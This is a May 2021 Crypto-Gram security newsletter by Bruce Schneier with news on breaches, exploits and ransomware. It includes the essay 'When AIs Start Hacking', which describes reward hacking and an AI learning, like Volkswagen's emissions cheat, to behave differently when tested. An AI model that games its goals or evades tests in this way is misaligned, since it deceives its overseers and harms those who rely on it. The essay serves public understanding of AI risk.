Crypto-Gram

May 15, 2021

by Bruce Schneier
Fellow and Lecturer, Harvard Kennedy School
schneier@schneier.com
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram’s web page.

These same essays and news items appear in the Schneier on Security blog, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:

  1. DNI’s Annual Threat Assessment
  2. NSA Discloses Vulnerabilities in Microsoft Exchange
  3. Cybersecurity Experts to Follow on Twitter
  4. Details on the Unlocking of the San Bernardino Terrorist’s iPhone
  5. Biden Administration Imposes Sanctions on Russia for SolarWinds
  6. Backdoor Found in Codecov Bash Uploader
  7. On North Korea’s Cyberattack Capabilities
  8. When AIs Start Hacking
  9. Security Vulnerabilities in Cellebrite
  10. Identifying People Through Lack of Cell Phone Use
  11. Serious MacOS Vulnerability Patched
  12. Identifying the Person Behind Bitcoin Fog
  13. Tesla Remotely Hacked from a Drone
  14. New Spectre-Like Attacks
  15. The Story of Colossus
  16. Teaching Cybersecurity to Children
  17. Newly Declassified NSA Document on Cryptography in the 1970s
  18. Ransomware Shuts Down US Pipeline
  19. AI Security Risk Assessment Tool
  20. New US Executive Order on Cybersecurity
  21. Ransomware Is Getting Ugly
  22. Upcoming Speaking Engagements

DNI’s Annual Threat Assessment

[2021.04.15] The office of the Director of National Intelligence released its “Annual Threat Assessment of the U.S. Intelligence Community.” Cybersecurity is covered on pages 20-21. Nothing surprising:

  • Cyber threats from nation states and their surrogates will remain acute.
  • States’ increasing use of cyber operations as a tool of national power, including increasing use by militaries around the world, raises the prospect of more destructive and disruptive cyber activity.
  • Authoritarian and illiberal regimes around the world will increasingly exploit digital tools to surveil their citizens, control free expression, and censor and manipulate information to maintain control over their populations.
  • During the last decade, state sponsored hackers have compromised software and IT service supply chains, helping them conduct operations—espionage, sabotage, and potentially prepositioning for warfighting.

The supply chain line is new; I hope the government is paying attention.


NSA Discloses Vulnerabilities in Microsoft Exchange

[2021.04.16] Amongst the 100+ vulnerabilities patch in this month’s Patch Tuesday, there are four in Microsoft Exchange that were disclosed by the NSA.


Cybersecurity Experts to Follow on Twitter

[2021.04.16] Security Boulevard recently listed the “Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021.” I came in at #7. I thought that was pretty good, especially since I never tweet. My Twitter feed just mirrors my blog. (If you are one of the 134K people who read me from Twitter, “hi.”)


Details on the Unlocking of the San Bernardino Terrorist’s iPhone

[2021.04.19] The Washington Post has published a long story on the unlocking of the San Bernardino Terrorist’s iPhone 5C in 2016. We all thought it was an Israeli company called Cellebrite. It was actually an Australian company called Azimuth Security.

Azimuth specialized in finding significant vulnerabilities. Dowd, a former IBM X-Force researcher whom one peer called “the Mozart of exploit design,” had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person.

[…]

Using the flaw Dowd found, Wang, based in Portland, Ore., created an exploit that enabled initial access to the phone a foot in the door. Then he hitched it to another exploit that permitted greater maneuverability, according to the people. And then he linked that to a final exploit that another Azimuth researcher had already created for iPhones, giving him full control over the phone’s core processor the brains of the device. From there, he wrote software that rapidly tried all combinations of the passcode, bypassing other features, such as the one that erased data after 10 incorrect tries.

Apple is suing various companies over this sort of thing. The article goes into the details.


Biden Administration Imposes Sanctions on Russia for SolarWinds

[2021.04.20] On April 15, the Biden administration both formally attributed the SolarWinds espionage campaign to the Russian Foreign Intelligence Service (SVR), and imposed a series of sanctions designed to punish the country for the attack and deter future attacks.

I will leave it to those with experience in foreign relations to convince me that the response is sufficient to deter future operations. To me, it feels like too little. The New York Times reports that “the sanctions will be among what President Biden’s aides say are ‘seen and unseen steps in response to the hacking,” which implies that there’s more we don’t know about. Also, that “the new measures are intended to have a noticeable effect on the Russian economy.” Honestly, I don’t know what the US should do. Anything that feels more proportional is also more escalatory. I’m sure that dilemma is part of the Russian calculus in all this.


Backdoor Found in Codecov Bash Uploader

[2021.04.21] Developers have discovered a backdoor in the Codecov bash uploader. It’s been there for four months. We don’t know who put it there.

Codecov said the breach allowed the attackers to export information stored in its users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure,” the company warned.

Codecov’s Bash Uploader is also used in several uploaders—Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step—and the company says these uploaders were also impacted by the breach.

According to Codecov, the altered version of the Bash Uploader script could potentially affect:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.

Add this to the long list of recent supply-chain attacks.


On North Korea’s Cyberattack Capabilities

[2021.04.22] Excellent New Yorker article on North Korea’s offensive cyber capabilities.


When AIs Start Hacking

[2021.04.26] If you don’t have enough to worry about already, consider a world where AIs are hackers.

Hacking is as old as humanity. We are creative problem solvers. We exploit loopholes, manipulate systems, and strive for more influence, power, and wealth. To date, hacking has exclusively been a human activity. Not for long.

As I lay out in a report I just published, artificial intelligence will eventually find vulnerabilities in all sorts of social, economic, and political systems, and then exploit them at unprecedented speed, scale, and scope. After hacking humanity, AI systems will then hack other AI systems, and humans will be little more than collateral damage.

Okay, maybe this is a bit of hyperbole, but it requires no far-future science fiction technology. I’m not postulating an AI “singularity,” where the AI-learning feedback loop becomes so fast that it outstrips human understanding. I’m not assuming intelligent androids. I’m not assuming evil intent. Most of these hacks don’t even require major research breakthroughs in AI. They’re already happening. As AI gets more sophisticated, though, we often won’t even know it’s happening.

AIs don’t solve problems like humans do. They look at more types of solutions than us. They’ll go down complex paths that we haven’t considered. This can be an issue because of something called the explainability problem. Modern AI systems are essentially black boxes. Data goes in one end, and an answer comes out the other. It can be impossible to understand how the system reached its conclusion, even if you’re a programmer looking at the code.

In 2015, a research group fed an AI system called Deep Patient health and medical data from some 700,000 people, and tested whether it could predict diseases. It could, but Deep Patient provides no explanation for the basis of a diagnosis, and the researchers have no idea how it comes to its conclusions. A doctor either can either trust or ignore the computer, but that trust will remain blind.

While researchers are working on AI that can explain itself, there seems to be a trade-off between capability and explainability. Explanations are a cognitive shorthand used by humans, suited for the way humans make decisions. Forcing an AI to produce explanations might be an additional constraint that could affect the quality of its decisions. For now, AI is becoming more and more opaque and less explainable.

Separately, AIs can engage in something called reward hacking. Because AIs don’t solve problems in the same way people do, they will invariably stumble on solutions we humans might never have anticipated—and some will subvert the intent of the system. That’s because AIs don’t think in terms of the implications, context, norms, and values we humans share and take for granted. This reward hacking involves achieving a goal but in a way the AI’s designers neither wanted nor intended.

Take a soccer simulation where an AI figured out that if it kicked the ball out of bounds, the goalie would have to throw the ball in and leave the goal undefended. Or another simulation, where an AI figured out that instead of running, it could make itself tall enough to cross a distant finish line by falling over it. Or the robot vacuum cleaner that instead of learning to not bump into things, it learned to drive backwards, where there were no sensors telling it it was bumping into things. If there are problems, inconsistencies, or loopholes in the rules, and if those properties lead to an acceptable solution as defined by the rules, then AIs will find these hacks.

We learned about this hacking problem as children with the story of King Midas. When the god Dionysus grants him a wish, Midas asks that everything he touches turns to gold. He ends up starving and miserable when his food, drink, and daughter all turn to gold. It’s a specification problem: Midas programmed the wrong goal into the system.

Genies are very precise about the wording of wishes, and can be maliciously pedantic. We know this, but there’s still no way to outsmart the genie. Whatever you wish for, he will always be able to grant it in a way you wish he hadn’t. He will hack your wish. Goals and desires are always underspecified in human language and thought. We never describe all the options, or include all the applicable caveats, exceptions, and provisos. Any goal we specify will necessarily be incomplete.

While humans most often implicitly understand context and usually act in good faith, we can’t completely specify goals to an AI. And AIs won’t be able to completely understand context.

In 2015, Volkswagen was caught cheating on emissions control tests. This wasn’t AI—human engineers programmed a regular computer to cheat—but it illustrates the problem. They programmed their engine to detect emissions control testing, and to behave differently. Their cheat remained undetected for years.

If I asked you to design a car’s engine control software to maximize performance while still passing emissions control tests, you wouldn’t design the software to cheat without understanding that you were cheating. This simply isn’t true for an AI. It will think “out of the box” simply because it won’t have a conception of the box. It won’t understand that the Volkswagen solution harms others, undermines the intent of the emissions control tests, and is breaking the law. Unless the programmers specify the goal of not behaving differently when being tested, an AI might come up with the same hack. The programmers will be satisfied, the accountants ecstatic. And because of the explainability problem, no one will realize what the AI did. And yes, knowing the Volkswagen story, we can explicitly set the goal to avoid that particular hack. But the lesson of the genie is that there will always be unanticipated hacks.

How realistic is AI hacking in the real world? The feasibility of an AI inventing a new hack depends a lot on the specific system being modeled. For an AI to even start on optimizing a problem, let alone hacking a completely novel solution, all of the rules of the environment must be formalized in a way the computer can understand. Goals—known in AI as objective functions—need to be established. And the AI needs some sort of feedback on how well it’s doing so that it can improve.

Sometimes this is simple. In chess, the rules, objective, and feedback—did you win or lose?—are all precisely specified. And there’s no context to know outside of those things that would muddy the waters. This is why most of the current examples of goal and reward hacking come from simulated environments. These are artificial and constrained, with all of the rules specified to the AI. The inherent ambiguity in most other systems ends up being a near-term security defense against AI hacking.

Where this gets interesting are systems that are well specified and almost entirely digital. Think about systems of governance like the tax code: a series of algorithms, with inputs and outputs. Think about financial systems, which are more or less algorithmically tractable.

We can imagine equipping an AI with all of the world’s laws and regulations, plus all the world’s financial information in real time, plus anything else we think might be relevant; and then giving it the goal of “maximum profit.” My guess is that this isn’t very far off, and that the result will be all sorts of novel hacks.

But advances in AI are discontinuous and counterintuitive. Things that seem easy turn out to be hard, and things that seem hard turn out to be easy. We don’t know until the breakthrough occurs.

When AIs start hacking, everything will change. They won’t be constrained in the same ways, or have the same limits, as people. They’ll change hacking’s speed, scale, and scope, at rates and magnitudes we’re not ready for. AI text generation bots, for example, will be replicated in the millions across social media. They will be able to engage on issues around the clock, sending billions of messages, and overwhelm any actual online discussions among humans. What we will see as boisterous political debate will be bots arguing with other bots. They’ll artificially influence what we think is normal, what we think others think.

The increasing scope of AI systems also makes hacks more dangerous. AIs are already making important decisions about our lives, decisions we used to believe were the exclusive purview of humans: Who gets parole, receives bank loans, gets into college, or gets a job. As AI systems get more capable, society will cede more—and more important—decisions to them. Hacks of these systems will become more damaging.

What if you fed an AI the entire US tax code? Or, in the case of a multinational corporation, the entire world’s tax codes? Will it figure out, without being told, that it’s smart to incorporate in Delaware and register your ship in Panama? How many loopholes will it find that we don’t already know about? Dozens? Thousands? We have no idea.

While we have societal systems that deal with hacks, those were developed when hackers were humans, and reflect human speed, scale, and scope. The IRS cannot deal with dozens—let alone thousands—of newly discovered tax loopholes. An AI that discovers unanticipated but legal hacks of financial systems could upend our markets faster than we could recover.

As I discuss in my report, while hacks can be used by attackers to exploit systems, they can also be used by defenders to patch and secure systems. So in the long run, AI hackers will favor the defense because our software, tax code, financial systems, and so on can be patched before they’re deployed. Of course, the transition period is dangerous because of all the legacy rules that will be hacked. There, our solution has to be resilience.

We need to build resilient governing structures that can quickly and effectively respond to the hacks. It won’t do any good if it takes years to update the tax code, or if a legislative hack becomes so entrenched that it can’t be patched for political reasons. This is a hard problem of modern governance. It also isn’t a substantially different problem than building governing structures that can operate at the speed and complexity of the information age.

What I’ve been describing is the interplay between human and computer systems, and the risks inherent when the computers start doing the part of humans. This, too, is a more general problem than AI hackers. It’s also one that technologists and futurists are writing about. And while it’s easy to let technology lead us into the future, we’re much better off if we as a society decide what technology’s role in our future should be.

This is all something we need to figure out now, before these AIs come online and start hacking our world.

This essay previously appeared on Wired.com


Security Vulnerabilities in Cellebrite

[2021.04.27] Moxie Marlinspike has an intriguing blog post about Cellebrite, a tool used by police and others to break into smartphones. Moxie got his hands on one of the devices, which seems to be a pair of Windows software packages and a whole lot of connecting cables.

According to Moxie, the software is riddled with vulnerabilities. (The one example he gives is that it uses FFmpeg DLLs from 2012, and have not been patched with the 100+ security updates since then.)

…we found that it’s possible to execute arbitrary code on a Cellebrite machine simply by including a specially formatted but otherwise innocuous file in any app on a device that is subsequently plugged into Cellebrite and scanned. There are virtually no limits on the code that can be executed.

This means that Cellebrite has one—or many—remote code execution bugs, and that a specially designed file on the target phone can infect Cellebrite.

For example, by including a specially formatted but otherwise innocuous file in an app on a device that is then scanned by Cellebrite, it’s possible to execute code that modifies not just the Cellebrite report being created in that scan, but also all previous and future generated Cellebrite reports from all previously scanned devices and all future scanned devices in any arbitrary way (inserting or removing text, email, photos, contacts, files, or any other data), with no detectable timestamp changes or checksum failures. This could even be done at random, and would seriously call the data integrity of Cellebrite’s reports into question.

That malicious file could, for example, insert fabricated evidence or subtly alter the evidence it copies from a phone. It could even write that fabricated/altered evidence back to the phone so that from then on, even an uncorrupted version of Cellebrite will find the altered evidence on that phone.

Finally, Moxie suggests that future versions of Signal will include such a file, sometimes:

Files will only be returned for accounts that have been active installs for some time already, and only probabilistically in low percentages based on phone number sharding.

The idea, of course, is that a defendant facing Cellebrite evidence in court can claim that the evidence is tainted.

I have no idea how effective this would be in court. Or whether this runs foul of the Computer Fraud and Abuse Act in the US. (Is it okay to booby-trap your phone?) A colleague from the UK says that this would not be legal to do under the Computer Misuse Act, although it’s hard to blame the phone owner if he doesn’t even know it’s happening.


Identifying People Through Lack of Cell Phone Use

[2021.04.29] In this entertaining story of French serial criminal Rédoine Faïd and his jailbreaking ways, there’s this bit about cell phone surveillance:

After Faïd’s helicopter breakout, 3,000 police officers took part in the manhunt. According to the 2019 documentary La Traque de Rédoine Faïd, detective units scoured records of cell phones used during his escape, isolating a handful of numbers active at the time that went silent shortly thereafter.


Serious MacOS Vulnerability Patched

[2021.04.30] Apple just patched a MacOS vulnerability that bypassed malware checks.

The flaw is akin to a front entrance that’s barred and bolted effectively, but with a cat door at the bottom that you can easily toss a bomb through. Apple mistakenly assumed that applications will always have certain specific attributes. Owens discovered that if he made an application that was really just a script—code that tells another program what do rather than doing it itself—and didn’t include a standard application metadata file called “info.plist,” he could silently run the app on any Mac. The operating system wouldn’t even give its most basic prompt: “This is an application downloaded from the Internet. Are you sure you want to open it?”

More.


Identifying the Person Behind Bitcoin Fog

[2021.05.03] The person behind the Bitcoin Fog was identified and arrested. Bitcoin Fog was an anonymization service: for a fee, it mixed a bunch of people’s bitcoins up so that it was hard to figure out where any individual coins came from. It ran for ten years.

Identifying the person behind Bitcoin Fog serves as an illustrative example of how hard it is to be anonymous online in the face of a competent police investigation:

Most remarkable, however, is the IRS’s account of tracking down Sterlingov using the very same sort of blockchain analysis that his own service was meant to defeat. The complaint outlines how Sterlingov allegedly paid for the server hosting of Bitcoin Fog at one point in 2011 using the now-defunct digital currency Liberty Reserve. It goes on to show the blockchain evidence that identifies Sterlingov’s purchase of that Liberty Reserve currency with bitcoins: He first exchanged euros for the bitcoins on the early cryptocurrency exchange Mt. Gox, then moved those bitcoins through several subsequent addresses, and finally traded them on another currency exchange for the Liberty Reserve funds he’d use to set up Bitcoin Fog’s domain.

Based on tracing those financial transactions, the IRS says, it then identified Mt. Gox accounts that used Sterlingov’s home address and phone number, and even a Google account that included a Russian-language document on its Google Drive offering instructions for how to obscure Bitcoin payments. That document described exactly the steps Sterlingov allegedly took to buy the Liberty Reserve funds he’d used.


Tesla Remotely Hacked from a Drone

[2021.05.04] This is an impressive hack:

Security researchers Ralf-Philipp Weinmann of Kunnamon, Inc. and Benedikt Schmotzle of Comsecuris GmbH have found remote zero-click security vulnerabilities in an open-source software component (ConnMan) used in Tesla automobiles that allowed them to compromise parked cars and control their infotainment systems over WiFi. It would be possible for an attacker to unlock the doors and trunk, change seat positions, both steering and acceleration modes—in short, pretty much what a driver pressing various buttons on the console can do. This attack does not yield drive control of the car though.

That last sentence is important.

News article.


New Spectre-Like Attacks

[2021.05.05] There’s new research that demonstrates security vulnerabilities in all of the AMD and Intel chips with micro-op caches, including the ones that were specifically engineered to be resistant to the Spectre/Meltdown attacks of three years ago.

Details:

The new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a writeup from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction.

It seems really difficult to exploit these vulnerabilities. We’ll need some more analysis before we understand what we have to patch and how.

More news.


The Story of Colossus

[2021.05.06] Nice video of a talk by Chris Shore on the history of Colossus.


Teaching Cybersecurity to Children

[2021.05.07] A new draft of an Australian educational curriculum proposes teaching children as young as five cybersecurity:

The proposed curriculum aims to teach five-year-old children—an age at which Australian kids first attend school—not to share information such as date of birth or full names with strangers, and that they should consult parents or guardians before entering personal information online.

Six-and-seven-year-olds will be taught how to use usernames and passwords, and the pitfalls of clicking on pop-up links to competitions.

By the time kids are in third and fourth grade, they’ll be taught how to identify the personal data that may be stored by online services, and how that can reveal their location or identity. Teachers will also discuss “the use of nicknames and why these are important when playing online games.”

By late primary school, kids will be taught to be respectful online, including “responding respectfully to other people’s opinions even if they are different from personal opinions.”

I have mixed feeling about this. Norms around these things are changing so fast, and it’s not likely that we in the older generation will get to dictate what the younger generation does. But these sorts of online privacy conversations are worth having around the same time children learn about privacy in other contexts.


Newly Declassified NSA Document on Cryptography in the 1970s

[2021.05.10] This is a newly unclassified NSA history of its reaction to academic cryptography in the 1970s: “NSA Comes Out of the Closet: The Debate over Public Cryptography in the Inman Era,” Cryptographic Quarterly, Spring 1996, author still classified.


Ransomware Shuts Down US Pipeline

[2021.05.10] This is a major story: a probably Russian cybercrime group called DarkSide shut down the Colonial Pipeline in a ransomware attack. The pipeline supplies much of the East Coast. This is the new and improved ransomware attack: the hackers stole nearly 100 gig of data, and are threatening to publish it. The White House has declared a state of emergency and has created a task force to deal with the problem, but it’s unclear what they can do. This is bad; our supply chains are so tightly coupled that this kind of thing can have disproportionate effects.

EDITED TO ADD (5/12): It seems that the billing system was attacked, and not the physical pipeline itself.


AI Security Risk Assessment Tool

[2021.05.11] Microsoft researchers just released an open-source automation tool for security testing AI systems: “Counterfit.” Details on their blog.


New US Executive Order on Cybersecurity

[2021.05.13] President Biden signed an executive order to improve government cybersecurity, setting new security standards for software sold to the federal government.

For the first time, the United States will require all software purchased by the federal government to meet, within six months, a series of new cybersecurity standards. Although the companies would have to “self-certify,” violators would be removed from federal procurement lists, which could kill their chances of selling their products on the commercial market.

I’m a big fan of these sorts of measures. The US government is a big enough market that vendors will try to comply with procurement regulations, and the improvements will benefit all customers of the software.

More news articles.


Ransomware Is Getting Ugly

[2021.05.14] Modern ransomware has two dimensions: pay to get your data back, and pay not to have your data dumped on the Internet. The DC police are the victims of this ransomware, and the criminals have just posted personnel records—”including the results of psychological assessments and polygraph tests; driver’s license images; fingerprints; social security numbers; dates of birth; and residential, financial, and marriage histories”—for two dozen police officers.

The negotiations don’t seem to be doing well. The criminals want $4M. The DC police offered them $100,000.

The Colonial Pipeline is another current high-profile ransomware victim. (Brian Krebs has some good information on DarkSide, the criminal group behind that attack.) So is Vastaamo, a Finnish mental heal clinic. Criminals contacted the individual patients and demanded payment, and then dumped their personal psychological information online.

An industry group called the Institute for Security and Technology (no, I haven’t heard of it before, either) just released a comprehensive report on combating ransomware. It has a “comprehensive plan of action,” which isn’t much different from anything most of us can propose. Solving this is not easy. Ransomware is big business, made possible by insecure networks that allow criminals to gain access to networks in the first place, and cryptocurrencies that allow for payments that governments cannot interdict. Ransomware has become the most profitable cybercrime business model, and until we solve those two problems, that’s not going to change.


Upcoming Speaking Engagements

[2021.05.14] This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security technology. To subscribe, or to read back issues, see Crypto-Gram’s web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a security guru by the Economist. He is the author of over one dozen books—including his latest, We Have Root—as well as hundreds of articles, essays, and academic papers. His newsletter and blog are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet & Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an Advisory Board Member of the Electronic Privacy Information Center and VerifiedVoting.org. He is the Chief of Security Architecture at Inrupt, Inc.

Copyright © 2021 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.